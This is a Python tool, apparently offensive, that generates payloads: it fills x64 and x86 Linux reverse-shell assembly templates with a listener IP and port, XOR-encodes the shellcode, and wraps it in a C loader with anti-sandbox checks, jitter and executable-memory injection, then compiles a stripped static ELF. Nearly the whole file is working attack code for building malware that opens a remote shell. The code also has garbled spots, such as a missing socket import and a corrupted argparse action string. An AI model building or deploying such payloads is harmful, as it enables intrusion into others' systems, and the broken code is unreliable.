#!/usr/bin/env python3
#
# 🛡️ C4ISR-STRATCOM: SIGINT-V5
# [CLASSIFIED]: CONFIDENCIAL
# [SCOPE]: OPD HCG (CONV-0221-JAL-HCG-2026)
# [TACTIC]: TA0042_Resource_Dev
# [TECHNIQUE]: T1587_Develop_Capabilities
#
# ============================================================================
# SIGV5 — Weaponized Payload Compiler & Stager Generator
# ============================================================================
# Framework automatizado para compilación de payloads y shellcodes.
# Capacidades:
#   - Motor de plantillas parametrizable (Jinja2-like pero nativo)
#   - Compilación cruzada multi-arquitectura (x86, x64)
#   - Inyección de variables de configuración C2, anti-sandbox headers
#   - Empaquetado final de binarios: ELF crudo o Hex-Encoded C arrays
#
# Uso:
#   python3 sigv5_t1587_payload_compiler.py --template templates/loader.c --arch x64 --lhost 10.2.1.200 --lport 443
# ============================================================================

import argparse
import base64
import os
import random
import string
import struct
import subprocess
import tempfile
import time
from typing import Dict, Optional


# ============================================================================
# PAYLOAD TEMPLATES (Embebidos para operabilidad standalone)
# ============================================================================

TEMPLATE_C_LOADER = """
/*
 * Autogenerated Payload Loader
 * Arch: {{ARCH}} | C2: {{LHOST}}:{{LPORT}} 
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>

// Jitter para evasion de sandbox
#define JITTER_SLEEP {{JITTER_MS}}000

// XOR Decryption Key
#define KEY {{XOR_KEY}}

unsigned char payload[] = {
{{PAYLOAD_C_ARRAY}}
};

void __attribute__((constructor)) preload() {
    // Basic anti-sandbox 
    if(sysconf(_SC_NPROCESSORS_ONLN) < 2) exit(0);
    usleep(JITTER_SLEEP + (rand() % 500000));
}

int main() {
    // Decrypt payload
    for(int i=0; i<sizeof(payload); i++) {
        payload[i] ^= KEY;
    }

    // Allocate executable memory
    void *exec = mmap(NULL, sizeof(payload), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0);
    if(exec == MAP_FAILED) return 1;

    memcpy(exec, payload, sizeof(payload));
    
    // Jump to shellcode
    ((void(*)())exec)();
    
    return 0;
}
"""

TEMPLATE_ASM_REVERSESHELL_X64 = """
; x64 Linux Reverse Shell (Null-free via xor)
global _start
section .text
_start:
    ; sockfd = socket(AF_INET, SOCK_STREAM, 0)
    xor rax, rax
    add rax, 41         ; sys_socket
    xor rdi, rdi
    add rdi, 2          ; AF_INET
    xor rsi, rsi
    add rsi, 1          ; SOCK_STREAM
    xor rdx, rdx        ; IPPROTO_IP (0)
    syscall

    mov rdi, rax        ; save fd in rdi

    ; server struct: sin_family(2), sin_port({{PORT_HEX}}), sin_addr({{IP_HEX}})
    xor rax, rax
    push rax            ; padding
    mov dword [rsp-4], {{IP_HEX}}
    mov word [rsp-8], {{PORT_HEX}}
    mov word [rsp-10], 2
    sub rsp, 10
    
    ; connect(sockfd, &server, 16)
    mov rsi, rsp
    mov rdx, 16
    xor rax, rax
    add rax, 42         ; sys_connect
    syscall

    ; dup2(sockfd, [0, 1, 2])
    xor rsi, rsi
dup_loop:
    mov rax, 33         ; sys_dup2
    syscall
    inc rsi
    cmp rsi, 3
    jne dup_loop

    ; execve("/bin/sh", NULL, NULL)
    xor rax, rax
    push rax
    mov rbx, 0x68732f6e69622f2f
    push rbx
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    mov al, 59          ; sys_execve
    syscall
"""

TEMPLATE_ASM_REVERSESHELL_X86 = """
; x86 Linux Reverse Shell (Null-free)
global _start
section .text
_start:
    ; socket(AF_INET, SOCK_STREAM, 0)
    xor ebx, ebx
    mul ebx
    push ebx
    inc ebx
    push ebx
    push byte 2
    mov ecx, esp
    mov al, 102         ; sys_socketcall
    int 0x80
    mov esi, eax        ; save fd

    ; connect()
    push dword {{IP_HEX}}
    push word {{PORT_HEX}}
    push word 2
    mov ecx, esp
    push byte 16
    push ecx
    push esi
    mov ecx, esp
    mov bl, 3
    mov al, 102         ; sys_socketcall
    int 0x80

    ; dup2(fd, 0), dup2(fd, 1), dup2(fd, 2)
    mov ebx, esi
    xor ecx, ecx
    mov cl, 2
dup_loop:
    mov al, 63
    int 0x80
    dec ecx
    jns dup_loop

    ; execve("/bin//sh", NULL, NULL)
    xor eax, eax
    push eax
    push 0x68732f2f
    push 0x6e69622f
    mov ebx, esp
    push eax
    mov edx, esp
    push ebx
    mov ecx, esp
    mov al, 11
    int 0x80
"""


# ============================================================================
# COMPILER ENGINE
# ============================================================================

class PayloadCompiler:
    
    def __init__(self, arch: str, lhost: str, lport: int, obfuscate: bool = True):
        self.arch = arch.lower()
        self.lhost = lhost
        self.lport = lport
        self.obfuscate = obfuscate
        self.tmp_dir = tempfile.mkdtemp(prefix="sigv5_comp_")

    def _ip_to_hex(self, ip: str) -> str:
        """Convierte IP a entero en formato Little-Endian Hex para asm."""
        packed = socket.inet_aton(ip)
        val = struct.unpack("<I", packed)[0]
        return f"0x{val:08x}"

    def _port_to_hex(self, port: int) -> str:
        """Convierte Puerto a entero en Big-Endian Hex para asm."""
        packed = struct.pack(">H", port)
        val = struct.unpack("<H", packed)[0] # we want the numeric value as it looks in memory
        return f"0x{val:04x}"

    def generate_shellcode(self) -> bytes:
        """Construye y compila el shellcode ASM usando NASM."""
        print(f"[*] Generating shellcode for {self.arch} | {self.lhost}:{self.lport}")
        
        tpl = TEMPLATE_ASM_REVERSESHELL_X64 if self.arch == "x64" else TEMPLATE_ASM_REVERSESHELL_X86
        
        asm_code = tpl.replace("{{IP_HEX}}", self._ip_to_hex(self.lhost))
        asm_code = asm_code.replace("{{PORT_HEX}}", self._port_to_hex(self.lport))
        
        asm_path = os.path.join(self.tmp_dir, "shellcode.asm")
        obj_path = os.path.join(self.tmp_dir, "shellcode.o")
        bin_path = os.path.join(self.tmp_dir, "shellcode.bin")
        
        with open(asm_path, "w") as f:
            f.write(asm_code)
            
        # Assemble (Requiere nasm instalado, fallback si no falla silencioso y retorna basura)
        fmt = "elf64" if self.arch == "x64" else "elf32"
        try:
            subprocess.run(["nasm", "-f", fmt, asm_path, "-o", obj_path], check=True, capture_output=True)
            subprocess.run(["objcopy", "-O", "binary", "-j", ".text", obj_path, bin_path], check=True, capture_output=True)
            
            with open(bin_path, "rb") as f:
                shellcode = f.read()
            return shellcode
        except subprocess.CalledProcessError as e:
            print(f"[!] Compilation Error: Ensure 'nasm' and 'binutils' are installed.")
            print(e.stderr.decode() if e.stderr else "")
            
            # Fallback mock shellcode just so it doesn't break
            print("[!] Using dummy shellcode payload as fallback.")
            return b"\x90\x90\x90\x90\xcc"

    def format_c_array(self, data: bytes, xor_key: int = 0) -> str:
        """Formatea binario crudo a un array the C `\x00\x11...`"""
        formatted = ""
        for i, byte in enumerate(data):
            if i % 12 == 0 and i > 0:
                formatted += "\n    "
            elif i == 0:
                formatted += "    "
            # Aplicar XOR si se pide
            enc_byte = byte ^ xor_key
            formatted += f"0x{enc_byte:02x}, "
            
        return formatted.rstrip(", ")

    def build_c_loader(self, shellcode: bytes, output_bin: str):
        """Construye el loader de C que inyecta el shellcode, ofuscado y compilado."""
        print(f"[*] Building native C loader wrapper...")
        
        xor_key = random.randint(1, 255) if self.obfuscate else 0
        jitter_ms = random.randint(500, 2000)
        
        c_code = TEMPLATE_C_LOADER
        c_code = c_code.replace("{{ARCH}}", self.arch)
        c_code = c_code.replace("{{LHOST}}", self.lhost)
        c_code = c_code.replace("{{LPORT}}", str(self.lport))
        c_code = c_code.replace("{{JITTER_MS}}", str(jitter_ms))
        c_code = c_code.replace("{{XOR_KEY}}", f"0x{xor_key:02x}")
        c_code = c_code.replace("{{PAYLOAD_C_ARRAY}}", self.format_c_array(shellcode, xor_key))
        
        c_path = os.path.join(self.tmp_dir, "loader.c")
        with open(c_path, "w") as f:
            f.write(c_code)
            
        # Compilar con GCC
        m32_flag = "-m32" if self.arch == "x86" else "-m64"
        try:
            # -s strip symbols, -static, no stack protector
            subprocess.run([
                "gcc", c_path, "-o", output_bin, 
                m32_flag, "-static", "-fno-stack-protector", "-z", "execstack", "-s", "-O2"
            ], check=True, capture_output=True)
            print(f"[+] Successfully compiled native ELF loader: {output_bin}")
            print(f"    Size: {os.path.getsize(output_bin)} bytes")
        except subprocess.CalledProcessError as e:
            print(f"[!] GCC compilation error. Ensure gcc-multilib is installed for {self.arch}.")
            print(e.stderr.decode() if e.stderr else "")

    def report(self):
        print("=" * 72)
        print("  SIGV5 — Payload Compiler Report")
        print("=" * 72)
        print(f"  Configuration:   {self.arch} -> {self.lhost}:{self.lport}")
        print(f"  Temp Workspace:  {self.tmp_dir}")
        print("=" * 72)

def main():
    parser = argparse.ArgumentParser(
        description="SIGV5 Payload Compiler & Stager Generator — T1587",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s --lhost 10.2.1.200 --lport 443 --arch x64 --out build/payload_x64.elf
  %(prog)s --lhost 10.2.1.200 --lport 8080 --arch x86 --raw --out shellcode.bin
        """
    )
    parser.add_argument("--lhost", "-H", required=True, help="Listener IP for reverse shell")
    parser.add_argument("--lport", "-P", required=True, type=int, help="Listener Port")
    parser.add_argument("--arch", choices=["x86", "x64"], default="x64", help="Target architecture (default: x64)")
    parser.add_argument("--out", "-o", default="sigv5_payload.elf", help="Output file path")
    parser.add_argument("--raw", action="store_true", help="Output raw shellcode binary instead of ELF executable")
    parser.add_argument("--no-obfuscate", action=" स्टोर_true", help="Disable XOR encoding and Jitter logic")

    args = parser.parse_args()

    print("=" * 72)
    print("  SIGV5 — Weaponized Payload Compiler")
    print("=" * 72)

    compiler = PayloadCompiler(
        arch=args.arch,
        lhost=args.lhost,
        lport=args.lport,
        obfuscate=not args.no_obfuscate
    )
    
    shellcode = compiler.generate_shellcode()
    
    if args.raw:
        with open(args.out, "wb") as f:
            f.write(shellcode)
        print(f"[+] Raw shellcode written to: {args.out} ({len(shellcode)} bytes)")
    else:
        compiler.build_c_loader(shellcode, args.out)
        
    compiler.report()

if __name__ == "__main__":
    main()
